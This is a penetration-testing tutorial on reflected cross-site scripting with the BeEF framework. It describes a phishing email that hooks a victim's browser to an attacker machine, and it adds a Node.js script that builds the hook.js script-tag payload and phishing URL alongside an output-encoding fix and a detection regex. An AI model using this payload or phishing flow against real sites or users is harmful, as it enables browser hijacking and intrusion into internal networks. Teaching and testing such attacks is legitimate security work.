This exploit tutorial gives a brief overview of Cross-Site Scripting (XSS) and shows how to leverage it to control a victim’s browser. XSS is a very common web application vulnerability that many dismiss as low risk because they don’t understand what’s possible. It can be used in a very subtle way to pivot into a company’s internal network by abusing a victim’s hooked browser.
Normally XSS targets a victim’s browser through the web application: when the user visits the affected page, the attacker’s script runs in the user’s browser, in the origin of the vulnerable site.
Cross Site Scripting Using BeEF
BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.
Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
The Attack Process
This attack has an Attacker and a Victim.
The Attacker crafts a phishing email whose link exploits a cross-site scripting vulnerability in an internal web application.
Once the victim’s browser is hooked, the Attacker can run BeEF command modules against it and use the browser as a foothold for further attacks against the victim’s machine and network.
This demonstrates that Cross-Site Scripting is a major issue not only for the applications themselves but for the users who are using them.
Find a web application that is vulnerable to Cross-Site Scripting.
In this example the vulnerable parameter is:
- Last Name
A phishing email is crafted and sent to the victim. The "Sign up Here" link in this email points to a crafted URL (visible at the bottom of the image below, and more clearly in a later image) that takes advantage of the Cross-Site Scripting vulnerability.
The victim receives the email and clicks the link. The injected script loads the BeEF hook, and the victim’s browser opens a connection back to the attacker’s machine without the victim noticing.
The victim’s browser is now hooked to the attacker’s machine, 10.10.10.99, on port 3000 (BeEF’s default listening port).
Once this connection has been established by exploiting the Cross-Site Scripting flaw through the phishing attack, BeEF allows the attacker to send commands to the victim’s browser.
As we can see, the IP address of the attacker’s machine is 10.10.10.99.
As we can see, the IP address of the victim’s machine is 10.10.10.97.
The image below shows the victim’s machine (10.10.10.97) connected to the BeEF framework running on the attacker’s machine (10.10.10.99).
Once the BeEF hook is loaded in the browser, the hooked browser appears in the BeEF controller, from which the attacker can select it and run command modules against it.
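The following Node.js script is an added example, not code from the original tutorial or from the BeEF project. It models the reflected-XSS step of the attack offline: the BeEF hook payload (`<script src="http://10.10.10.99:3000/hook.js">`, using the attacker address and port from the write-up), the crafted phishing URL, a constructed stand-in for the vulnerable sign-up page that reflects the last-name parameter unencoded, and the same page with output encoding applied so the hook no longer lands. The application hostname `signup.example.test`, the parameter name `lastName` and the page template are assumptions; only the BeEF address and the "Last Name" parameter come from the page.

```javascript
// Added example (not from the original tutorial or from BeEF).
// Assumed: the vulnerable app lives at http://signup.example.test/signup and
// reflects the query parameter "lastName" into the page body.

// The classic BeEF hook: a script tag that pulls hook.js from the BeEF server.
// 10.10.10.99:3000 is the attacker's machine from the write-up.
function buildHookPayload(beefHost, beefPort) {
  return `<script src="http://${beefHost}:${beefPort}/hook.js"></script>`;
}

// The attacker's phishing link: the payload URL-encoded into the vulnerable
// parameter so the target application reflects it into the page.
function buildPhishingUrl(baseUrl, paramName, payload) {
  const url = new URL(baseUrl);
  url.searchParams.set(paramName, payload);
  return url.toString();
}

// Minimal HTML encoding for text placed inside an element body.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Constructed stand-in for the vulnerable application: reflects the
// parameter with no output encoding, so any HTML in it becomes live markup.
function renderVulnerable(requestUrl) {
  const lastName = new URL(requestUrl).searchParams.get("lastName") ?? "";
  return `<html><body><h1>Sign up</h1><p>Welcome, ${lastName}</p></body></html>`;
}

// The same page with the fix: encode untrusted data before reflecting it.
function renderHardened(requestUrl) {
  const lastName = new URL(requestUrl).searchParams.get("lastName") ?? "";
  return `<html><body><h1>Sign up</h1><p>Welcome, ${escapeHtml(lastName)}</p></body></html>`;
}

// Check whether a response contains a live <script> tag loading a BeEF hook.
// Handy for confirming a finding in a proxy or for a regression test.
function containsHookScript(html) {
  return /<script[^>]*\ssrc=["'][^"']*\/hook\.js["'][^>]*>/i.test(html);
}

// Walk through the attack flow from the tutorial and report the outcome
// against both the vulnerable and the hardened rendering.
function demo() {
  const payload = buildHookPayload("10.10.10.99", 3000);
  const link = buildPhishingUrl("http://signup.example.test/signup", "lastName", payload);
  return {
    link,
    vulnerableHooked: containsHookScript(renderVulnerable(link)),
    hardenedHooked: containsHookScript(renderHardened(link)),
  };
}

console.log(demo());
```

Running it prints the crafted link, `vulnerableHooked: true` and `hardenedHooked: false`: the unencoded reflection turns the attacker's parameter into a `<script>` tag that would load hook.js into the victim's browser, while the encoded version shows the payload as harmless text.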